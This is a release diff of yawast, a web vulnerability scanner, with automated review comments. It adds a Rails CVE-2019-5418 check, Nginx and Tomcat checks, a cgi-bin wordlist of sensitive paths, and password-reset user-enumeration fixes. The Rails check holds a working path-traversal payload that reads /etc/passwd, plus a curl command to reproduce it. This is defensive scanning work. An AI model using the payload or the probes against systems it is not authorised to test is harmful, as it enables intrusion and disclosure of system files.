yawast 0.7.0.beta2 → 0.7.0.beta3

checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA1:
3
- metadata.gz: 449a14e8b574b57874cdbb8fff80b11b667b1d81
4
- data.tar.gz: 7a724b743c8d27f5a92b0e477d27adf06e5b837f
3
+ metadata.gz: 7b0bb4cac61cb155a8c1bd6ac9393bfd7191e617
4
+ data.tar.gz: 11d3f67fb4d47496a67021a9802138713d167892
5
5
  SHA512:
6
- metadata.gz: 8e692349d710ad580cb80b027e7bd1da180e954a3dad1f9d4f493802c9c4f4cd5a0909ad2afd62429d6c2c7b61711ef24f3e887262b5fe899dcde3e316feb09f
7
- data.tar.gz: 68f55b6ff5fd2e62d0b608ac3c6afa981f9cd59d69cc2de34878b7e9d60e929232043d022d3549b5a8ad0d3f29a0a22fbdb4e502b6c48b6a0570a6db34da4b3b
6
+ metadata.gz: 36da9932032084faf8641741829ad7df7a2bdfa8be6f7c73ad05e6f3a0cedce7092b59be3dbd935b25ffe4ac3d7b22aaffffb55ba3fd6eba4b0219e12a75241d
7
+ data.tar.gz: a0f36333064f4299d03ba7139fe6fe8821929107730c9b5cdbfe584977be05ee211ffeb3dd1fe1bd33261285015725cc77f77abd99b2c8898fc7e841468140b3
data/.rubocop.yml CHANGED
@@ -27,3 +27,9 @@ Style/RedundantBegin:
27
27
 
28
28
  Style/SafeNavigation:
29
29
  Enabled: false
30
+
31
+ Style/WordArray:
32
+ Enabled: false
33
+
34
+ Style/Next:
35
+ Enabled: false
data/CHANGELOG.md CHANGED
@@ -13,6 +13,9 @@
13
13
  * [#148](https://github.com/adamcaudill/yawast/issues/148) - Added `--vuln_scan` option to enable new vulnerability scanner
14
14
  * [#151](https://github.com/adamcaudill/yawast/issues/151) - User Enumeration via Password Reset Form Timing Differences
15
15
  * [#152](https://github.com/adamcaudill/yawast/issues/152) - Add check for 64bit TLS Cert Serial Numbers
16
+ * [#156](https://github.com/adamcaudill/yawast/issues/156) - Check for Rails CVE-2019-5418
17
+ * [#157](https://github.com/adamcaudill/yawast/issues/157) - Add check for Nginx Status Page
18
+ * [#158](https://github.com/adamcaudill/yawast/issues/158) - Add check for Tomcat RCE CVE-2019-0232
16
19
  * [#130](https://github.com/adamcaudill/yawast/issues/130) - Bug: HSTS Error leads to printing HTML
17
20
  * [#132](https://github.com/adamcaudill/yawast/issues/132) - Bug: Typo in SSL Output
18
21
  * [#142](https://github.com/adamcaudill/yawast/issues/142) - Bug: Error In Collecting DNS Information
data/README.md CHANGED
@@ -53,7 +53,7 @@ The following tests are performed:
53
53
  * *(Generic)* Presence of readme.html
54
54
  * *(Generic)* Presence of CHANGELOG.txt
55
55
  * *(Generic)* Missing cookie flags (Secure, HttpOnly, and SameSite)
56
- * *(Generic)* Search for 14,169 common files (via `--files`) & 21,332 common directories (via `--dir`)
56
+ * *(Generic)* Search for 14,405 common files (via `--files`) & 21,332 common directories (via `--dir`)
57
57
  * *(Apache)* Info Disclosure: Module listing enabled
58
58
  * *(Apache)* Info Disclosure: Server version
59
59
  * *(Apache)* Info Disclosure: OpenSSL module version
@@ -65,7 +65,10 @@ The following tests are performed:
65
65
  * *(Apache Tomcat)* Tomcat Host Manager Weak Password
66
66
  * *(Apache Tomcat)* Tomcat version detection via invalid HTTP verb
67
67
  * *(Apache Tomcat)* Tomcat PUT RCE (CVE-2017-12617)
68
+ * *(Apache Tomcat)* Tomcat Windows RCE (CVE-2019-0232)
68
69
  * *(Apache Struts)* Sample files which may be vulnerable
70
+ * *(Nginx)* Info Disclosure: Server version
71
+ * *(Nginx)* Info Disclosure: Server status
69
72
  * *(IIS)* Info Disclosure: Server version
70
73
  * *(ASP.NET)* Info Disclosure: ASP.NET version
71
74
  * *(ASP.NET)* Info Disclosure: ASP.NET MVC version
@@ -74,6 +77,7 @@ The following tests are performed:
74
77
  * *(ASP.NET)* Debugging Enabled
75
78
  * *(nginx)* Info Disclosure: Server version
76
79
  * *(PHP)* Info Disclosure: PHP version
80
+ * *(Rails)* File Content Disclosure: CVE-2019-5418
77
81
 
78
82
  CMS Detection:
79
83
 
@@ -3851,6 +3851,7 @@ bottom.php
3851
3851
  bounce.php
3852
3852
  boutique.html
3853
3853
  boutique.php
3854
+ bower.json
3854
3855
  box.gif
3855
3856
  box.php
3856
3857
  br.asp
@@ -4183,7 +4184,213 @@ cfg.php
4183
4184
  cfgECText.cfm
4184
4185
  cgi-bin.bak
4185
4186
  cgi-bin.old
4187
+ cgi-bin/.access
4188
+ cgi-bin/.htaccess
4189
+ cgi-bin/.htaccess.old
4190
+ cgi-bin/.htaccess.save
4191
+ cgi-bin/.htaccess~
4192
+ cgi-bin/.htpasswd
4193
+ cgi-bin/.passwd
4194
+ cgi-bin/.www_acl
4195
+ cgi-bin/.wwwacl
4196
+ cgi-bin//_vti_bin/fpcount.exe
4197
+ cgi-bin/CGImail.exe
4198
+ cgi-bin/Cgitest.exe
4199
+ cgi-bin/FormMail.cgi
4200
+ cgi-bin/MachineInfo
4201
+ cgi-bin/Pbcgi.exe
4202
+ cgi-bin/Upload.pl
4203
+ cgi-bin/WINDMAIL.EXE
4204
+ cgi-bin/add_ftp.cgi
4205
+ cgi-bin/addbanner.cgi
4206
+ cgi-bin/adduser.cgi
4207
+ cgi-bin/admin.php
4208
+ cgi-bin/admin.pl
4209
+ cgi-bin/adminwww.cgi
4210
+ cgi-bin/af.cgi
4211
+ cgi-bin/aglimpse
4212
+ cgi-bin/aglimpse.cgi
4213
+ cgi-bin/alienform.cgi
4214
+ cgi-bin/amadmin.pl
4215
+ cgi-bin/ans.pl
4216
+ cgi-bin/architext_query.cgi
4186
4217
  cgi-bin/awstats.pl
4218
+ cgi-bin/badmin.cgi
4219
+ cgi-bin/banner.cgi
4220
+ cgi-bin/bannereditor.cgi
4221
+ cgi-bin/bash
4222
+ cgi-bin/bigconf.cgi
4223
+ cgi-bin/book.cgi
4224
+ cgi-bin/build.cgi
4225
+ cgi-bin/cached_feed.cgi
4226
+ cgi-bin/cachemgr.cgi
4227
+ cgi-bin/calendar.php
4228
+ cgi-bin/calendar.pl
4229
+ cgi-bin/cart.pl
4230
+ cgi-bin/cart32.exe
4231
+ cgi-bin/cartmanager.cgi
4232
+ cgi-bin/ccbill-local.cgi
4233
+ cgi-bin/ccbill-local.pl
4234
+ cgi-bin/cfgwiz.exe
4235
+ cgi-bin/cgi-lib.pl
4236
+ cgi-bin/cgi-test.exe
4237
+ cgi-bin/cgimail.exe
4238
+ cgi-bin/cgitest.exe
4239
+ cgi-bin/change-your-password.pl
4240
+ cgi-bin/clickcount.pl
4241
+ cgi-bin/clickresponder.pl
4242
+ cgi-bin/cmd.exe
4243
+ cgi-bin/cmd1.exe
4244
+ cgi-bin/code.php
4245
+ cgi-bin/code.php3
4246
+ cgi-bin/com5.java
4247
+ cgi-bin/com5.pl
4248
+ cgi-bin/commandit.cgi
4249
+ cgi-bin/commerce.cgi
4250
+ cgi-bin/common.php
4251
+ cgi-bin/compatible.cgi
4252
+ cgi-bin/contents.htm
4253
+ cgi-bin/count.cgi
4254
+ cgi-bin/csh
4255
+ cgi-bin/cstat.pl
4256
+ cgi-bin/db_manager.cgi
4257
+ cgi-bin/dbmlparser.exe
4258
+ cgi-bin/diagnose.cgi
4259
+ cgi-bin/dig.cgi
4260
+ cgi-bin/download.cgi
4261
+ cgi-bin/dumpenv.pl
4262
+ cgi-bin/edit.pl
4263
+ cgi-bin/enter.cgi
4264
+ cgi-bin/environ.cgi
4265
+ cgi-bin/environ.pl
4266
+ cgi-bin/finger.pl
4267
+ cgi-bin/flexform.cgi
4268
+ cgi-bin/formmail.cgi
4269
+ cgi-bin/formmail.pl
4270
+ cgi-bin/foxweb.dll
4271
+ cgi-bin/foxweb.exe
4272
+ cgi-bin/fpadmin.htm
4273
+ cgi-bin/fpremadm.exe
4274
+ cgi-bin/fpsrvadm.exe
4275
+ cgi-bin/ftp.pl
4276
+ cgi-bin/ftpsh
4277
+ cgi-bin/generate.cgi
4278
+ cgi-bin/get32.exe
4279
+ cgi-bin/getdoc.cgi
4280
+ cgi-bin/gm.cgi
4281
+ cgi-bin/guestbook.cgi
4282
+ cgi-bin/guestbook.pl
4283
+ cgi-bin/handler.cgi
4284
+ cgi-bin/hello.bat
4285
+ cgi-bin/hitview.cgi
4286
+ cgi-bin/hpnst.exe
4287
+ cgi-bin/htimage.exe
4288
+ cgi-bin/html2chtml.cgi
4289
+ cgi-bin/html2wml.cgi
4290
+ cgi-bin/htsearch.cgi
4291
+ cgi-bin/imagemap
4292
+ cgi-bin/imagemap.exe
4293
+ cgi-bin/index.pl
4294
+ cgi-bin/infosrch.cgi
4295
+ cgi-bin/input.bat
4296
+ cgi-bin/journal.cgi
4297
+ cgi-bin/ksh
4298
+ cgi-bin/listrec.pl
4299
+ cgi-bin/loadpage.cgi
4300
+ cgi-bin/log-reader.cgi
4301
+ cgi-bin/logi.php
4302
+ cgi-bin/login
4303
+ cgi-bin/logit.cgi
4304
+ cgi-bin/logs.pl
4305
+ cgi-bin/mailform.exe
4306
+ cgi-bin/mailit.pl
4307
+ cgi-bin/main.cgi
4308
+ cgi-bin/main_menu.pl
4309
+ cgi-bin/majordomo.pl
4310
+ cgi-bin/man.sh
4311
+ cgi-bin/meta.pl
4312
+ cgi-bin/minimal.exe
4313
+ cgi-bin/mkilog.exe
4314
+ cgi-bin/mkplog.exe
4315
+ cgi-bin/moin.cgi
4316
+ cgi-bin/mrtg.cgi
4317
+ cgi-bin/noshell
4318
+ cgi-bin/nph-error.pl
4319
+ cgi-bin/nph-maillist.pl
4320
+ cgi-bin/pass
4321
+ cgi-bin/passwd
4322
+ cgi-bin/passwd.txt
4323
+ cgi-bin/password
4324
+ cgi-bin/perl
4325
+ cgi-bin/perl.exe
4326
+ cgi-bin/php.ini
4327
+ cgi-bin/post16.exe
4328
+ cgi-bin/post32.exe
4329
+ cgi-bin/post_query
4330
+ cgi-bin/postcards.cgi
4331
+ cgi-bin/ppdscgi.exe
4332
+ cgi-bin/printenv
4333
+ cgi-bin/printenv.pl
4334
+ cgi-bin/processit.pl
4335
+ cgi-bin/profile.cgi
4336
+ cgi-bin/quikstore.cfg
4337
+ cgi-bin/redir.exe
4338
+ cgi-bin/register.cgi
4339
+ cgi-bin/responder.cgi
4340
+ cgi-bin/retrieve_password.pl
4341
+ cgi-bin/rguest.exe
4342
+ cgi-bin/rksh
4343
+ cgi-bin/rmp_query
4344
+ cgi-bin/robpoll.cgi
4345
+ cgi-bin/rsh
4346
+ cgi-bin/search
4347
+ cgi-bin/search.php
4348
+ cgi-bin/sendform.cgi
4349
+ cgi-bin/sendpage.pl
4350
+ cgi-bin/sendtemp.pl
4351
+ cgi-bin/sh
4352
+ cgi-bin/shop.cgi
4353
+ cgi-bin/show.pl
4354
+ cgi-bin/showuser.cgi
4355
+ cgi-bin/shtml.dll
4356
+ cgi-bin/simplestguest.cgi
4357
+ cgi-bin/simplestmail.cgi
4358
+ cgi-bin/stat.pl
4359
+ cgi-bin/stats.pl
4360
+ cgi-bin/stats.prf
4361
+ cgi-bin/statsconfig
4362
+ cgi-bin/statusconfig.pl
4363
+ cgi-bin/statview.pl
4364
+ cgi-bin/store.cgi
4365
+ cgi-bin/survey
4366
+ cgi-bin/survey.cgi
4367
+ cgi-bin/tablebuild.pl
4368
+ cgi-bin/tcsh
4369
+ cgi-bin/test-cgi.bat
4370
+ cgi-bin/test-cgi.exe
4371
+ cgi-bin/test-cgi.tcl
4372
+ cgi-bin/test.bat
4373
+ cgi-bin/test2.pl
4374
+ cgi-bin/textcounter.pl
4375
+ cgi-bin/title.cgi
4376
+ cgi-bin/traffic.cgi
4377
+ cgi-bin/tst.bat
4378
+ cgi-bin/upload.cgi
4379
+ cgi-bin/viewlogs.pl
4380
+ cgi-bin/visadmin.exe
4381
+ cgi-bin/visitor.exe
4382
+ cgi-bin/vote.cgi
4383
+ cgi-bin/wais.pl
4384
+ cgi-bin/wconsole.dll
4385
+ cgi-bin/webfind.exe
4386
+ cgi-bin/webif.cgi
4387
+ cgi-bin/webmap.cgi
4388
+ cgi-bin/webplus.exe
4389
+ cgi-bin/windmail
4390
+ cgi-bin/windmail.exe
4391
+ cgi-bin/wrap.cgi
4392
+ cgi-bin/wwwadmin.pl
4393
+ cgi-bin/zsh
4187
4394
  cgi.bin
4188
4395
  cgi.pl/
4189
4396
  cgu.htm
@@ -6855,6 +7062,7 @@ groupmgr.php
6855
7062
  groupmsg.php
6856
7063
  groups.html
6857
7064
  groups.php
7065
+ gruntfile.js
6858
7066
  gs.php
6859
7067
  gsearch.html
6860
7068
  gsearch.php
data/lib/scanner/core.rb CHANGED
@@ -69,6 +69,7 @@ module Yawast
69
69
 
70
70
  # server specific checks
71
71
  Yawast::Scanner::Plugins::Servers::Apache.check_all(@uri)
72
+ Yawast::Scanner::Plugins::Servers::Nginx.check_all(@uri)
72
73
  Yawast::Scanner::Plugins::Servers::Iis.check_all(@uri, head)
73
74
 
74
75
  Yawast::Scanner::Plugins::Http::FilePresence.check_all @uri, options.files
@@ -77,9 +78,9 @@ module Yawast
77
78
  Yawast::Scanner::Plugins::Http::Generic.check_propfind(@uri)
78
79
  Yawast::Scanner::Plugins::Http::Generic.check_options(@uri)
79
80
  Yawast::Scanner::Plugins::Http::Generic.check_trace(@uri)
80
- end
81
81
 
82
- Yawast::Scanner::Plugins::Spider::Spider.spider(@uri) if options.spider
82
+ Yawast::Scanner::Plugins::Spider::Spider.spider(@uri) if options.spider
83
+ end
83
84
 
84
85
  # check for common directories
85
86
  if options.dir
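Review bot: In the second hunk the `end` that previously closed the enclosing block has moved below the spider call, so `Spider.spider(@uri) if options.spider` now runs only when that block's condition holds, whereas before it ran regardless of it; the block's opening line is outside the hunk, so which condition that is cannot be seen here, and neither the changelog nor a comment records the intent. If this is deliberate (for example because the spidered link list feeds the framework checks added in this release), a one-line comment above the call such as `# spider runs inside this block so its link list is available to the checks below` would stop the next reader from "fixing" it; if it is an accidental re-indentation, the `end` belongs back above the spider call. Separately, the new `Nginx.check_all(@uri)` in the first hunk is not given the `head` response that `Iis.check_all(@uri, head)` reuses, so it presumably issues its own request; worth confirming that is intended.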
@@ -10,7 +10,17 @@ module Yawast
10
10
  regex = /<meta name="generator[^>]+content\s*=\s*['"]([^'"]+)['"][^>]*>/
11
11
  match = body.match regex
12
12
 
13
- Yawast::Utilities.puts_info "Meta Generator: #{match[1]}" if match
13
+ if match
14
+ Yawast::Utilities.puts_info "Meta Generator: #{match[1]}"
15
+
16
+ Yawast::Shared::Output.log_hash 'vulnerabilities',
17
+ 'cms_meta_generator_exposed',
18
+ {vulnerable: true, generator: match[1]}
19
+ else
20
+ Yawast::Shared::Output.log_hash 'vulnerabilities',
21
+ 'cms_meta_generator_exposed',
22
+ {vulnerable: false, generator: nil}
23
+ end
14
24
  end
15
25
  end
16
26
  end
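Review bot: The `if match`/`else` at new lines 13–23 repeats the same `log_hash` call (same channel, same key) in both branches with only the hash values differing, which is easy to let drift; a single call after the optional output line says the same thing, e.g. `Yawast::Utilities.puts_info "Meta Generator: #{match[1]}" if match` followed by `Yawast::Shared::Output.log_hash 'vulnerabilities', 'cms_meta_generator_exposed', {vulnerable: !match.nil?, generator: match && match[1]}`. The enclosing method starts above the hunk (the `regex`/`match` lines are context), so its signature and any early returns are not visible here. Note also that `generator` is text taken verbatim from the target page's meta tag, so anything consuming the logged hash should treat it as untrusted input rather than a trusted product name.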
@@ -0,0 +1,39 @@
1
+ # frozen_string_literal: true
2
+
3
+ module Yawast
4
+ module Scanner
5
+ module Plugins
6
+ module Applications
7
+ module Framework
8
+ class Rails
9
+ def self.check_all(uri, links)
10
+ check_cve_2019_5418 links
11
+ end
12
+
13
+ def self.check_cve_2019_5418(links)
14
+ Yawast::Shared::Output.log_hash 'vulnerabilities',
15
+ 'rails_cve_2019_5418',
16
+ {vulnerable: false, body: nil}
17
+
18
+ links.each do |link|
19
+ # this only applies to controllers, so skip the check unless the link ends with '/'
20
+ next unless link.to_s.end_with? '/'
21
+
22
+ body = Yawast::Shared::Http.get(URI.parse(link), {'Accept' => '../../../../../../../../../etc/passwd{{'})
23
+ if body.include? 'root:'
24
+ Yawast::Utilities.puts_vuln 'Rails CVE-2019-5418: File Content Disclosure'
25
+ Yawast::Utilities.puts_raw "\tcurl -H 'Accept: ../../../../../../../../../etc/passwd{{' #{link}"
26
+
27
+ Yawast::Shared::Output.log_hash 'vulnerabilities',
28
+ 'rails_cve_2019_5418',
29
+ {vulnerable: true, body: body, uri: link}
30
+ break
31
+ end
32
+ end
33
+ end
34
+ end
35
+ end
36
+ end
37
+ end
38
+ end
39
+ end
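Review bot: `body.include? 'root:'` at line 23 is a weak signal for a confirmed file disclosure — any response whose text happens to contain `root:` (documentation, a JSON key, a stack trace) will be reported as vulnerable to CVE-2019-5418 with `vulnerable: true`; matching the actual passwd record shape, e.g. `if body =~ /^root:[^:\n]*:0:0:/`, avoids that class of false positive. If `Yawast::Shared::Http.get` can return `nil` on a failed request (its contract is not visible here), the `include?` call raises instead of moving on to the next link, so a `next if body.nil?` guard before the check would keep one dead URL from aborting the whole scan. The success path also stores the entire disclosed file in the output (`body: body`); consider recording only the matched line or a short excerpt, since the full `/etc/passwd` of the target otherwise ends up in every report. Finally, the `next unless link.to_s.end_with? '/'` heuristic and the `# this only applies to controllers` comment skip any controller route without a trailing slash, so the comment should say this is a coverage trade-off rather than a property of the vulnerability.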
@@ -10,11 +10,7 @@ module Yawast
10
10
  module Generic
11
11
  class PasswordReset
12
12
  def self.setup
13
- @reset_page = if Yawast.options.pass_reset_page.nil?
14
- Yawast::Utilities.prompt 'What is the application password reset page?'
15
- else
16
- Yawast.options.pass_reset_page
17
- end
13
+ @reset_page = Yawast.options.pass_reset_page
18
14
 
19
15
  @valid_user = if Yawast.options.user.nil?
20
16
  Yawast::Utilities.prompt 'What is a valid user?'
@@ -23,6 +19,7 @@ module Yawast
23
19
  end
24
20
 
25
21
  @timing = {true => [], false => []}
22
+ @element_name = nil
26
23
  end
27
24
 
28
25
  def self.check_resp_user_enum
@@ -94,12 +91,12 @@ module Yawast
94
91
  invalid_4: @timing[false][3], invalid_5: @timing[false][4]}
95
92
  end
96
93
  rescue ArgumentError => e
97
- Yawast::Utilities.puts "Unable to find a matching element to perform the User Enumeration via Password Reset Response test (#{e.message})"
94
+ Yawast::Utilities.puts_error "Unable to find a matching element to perform the User Enumeration via Password Reset Response test (#{e.message})"
98
95
  end
99
96
  end
100
97
 
101
98
  def self.fill_form_get_body(uri, user, valid, log_output)
102
- options = Selenium::WebDriver::Chrome::Options.new({args: ['headless']})
99
+ options = Selenium::WebDriver::Chrome::Options.new({args: ['headless', 'incognito']})
103
100
 
104
101
  # if we have a proxy set, use that
105
102
  if !Yawast.options.proxy.nil?
@@ -115,6 +112,18 @@ module Yawast
115
112
  # find the page form element - this is going to be a best effort thing, and may not always be right
116
113
  element = find_user_field driver
117
114
 
115
+ # the element may not actually be visible yet (heavy JS pages)
116
+ # so, we'll go into a loop for a few seconds to see if it'll show up
117
+ counter = 0
118
+ unless element.displayed?
119
+ until element.displayed?
120
+ sleep 0.5
121
+ counter += 1
122
+
123
+ break if counter > 20
124
+ end
125
+ end
126
+
118
127
  element.send_keys user
119
128
 
120
129
  beginning_time = Time.now
@@ -155,22 +164,39 @@ module Yawast
155
164
  element = find_element driver, 'forgetPasswordEmailOrUsername'
156
165
  return element unless element.nil?
157
166
 
167
+ element = find_element driver, 'username'
168
+ return element unless element.nil?
169
+
158
170
  # if we got here, it means that we don't have an element we know about, so we have to prompt
159
- Yawast::Utilities.puts_raw 'Unable to find a known element to enter the user name. Please identify the proper element.'
160
- Yawast::Utilities.puts_raw 'If this element name seems to be common, please request that it be added: https://github.com/adamcaudill/yawast/issues'
161
- element_name = Yawast::Utilities.prompt 'What is the user/email entry element name?'
162
- element = find_element driver, element_name
171
+ if @element_name.nil?
172
+ Yawast::Utilities.puts_raw 'Unable to find a known element to enter the user name. Please identify the proper element.'
173
+ Yawast::Utilities.puts_raw 'If this element name seems to be common, please request that it be added: https://github.com/adamcaudill/yawast/issues'
174
+ @element_name = Yawast::Utilities.prompt 'What is the user/email entry element name?'
175
+ end
176
+ element = find_element driver, @element_name
163
177
  return element unless element.nil?
164
178
 
165
179
  raise ArgumentError, 'No matching element found.'
166
180
  end
167
181
 
168
182
  def self.find_element(driver, name)
183
+ ret = nil
184
+
185
+ # first, check by name
169
186
  begin
170
- return driver.find_element({name: name})
171
- rescue ArgumentError
172
- return nil
187
+ ret = driver.find_element({name: name})
188
+ rescue # rubocop:disable Style/RescueStandardError, Lint/HandleExceptions
189
+ # do nothing
173
190
  end
191
+
192
+ # next, maybe it's id instead of name
193
+ begin
194
+ ret = driver.find_element({id: name})
195
+ rescue # rubocop:disable Style/RescueStandardError, Lint/HandleExceptions
196
+ # do nothing
197
+ end
198
+
199
+ ret
174
200
  end
175
201
  end
176
202
  end
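Review bot: The visibility wait added in the `fill_form_get_body` hunk (new lines 115–125) falls through after roughly ten seconds and still calls `element.send_keys user` on an element that never became visible; Selenium then raises an element-not-interactable error, which is not the `ArgumentError` that the `rescue ArgumentError => e` shown in the third hunk handles, so the run dies with a raw driver exception instead of the `Unable to find a matching element…` message. The outer `unless element.displayed?` is also redundant, since `until element.displayed?` already skips the loop when the element is visible. Using Selenium's own wait and converting its failure into the error type the caller already expects keeps the existing error path working; the base `WebDriverError` is rescued so the exact timeout class name (which differs between selenium-webdriver versions) does not matter.
```ruby
    # the element may not actually be visible yet (heavy JS pages), so give it up to ~10s to appear
    begin
      Selenium::WebDriver::Wait.new(timeout: 10, interval: 0.5).until { element.displayed? }
    rescue Selenium::WebDriver::Error::WebDriverError
      raise ArgumentError, 'User name element was found but never became visible.'
    end

    element.send_keys user
    # … unchanged: timing measurement and form submission …
```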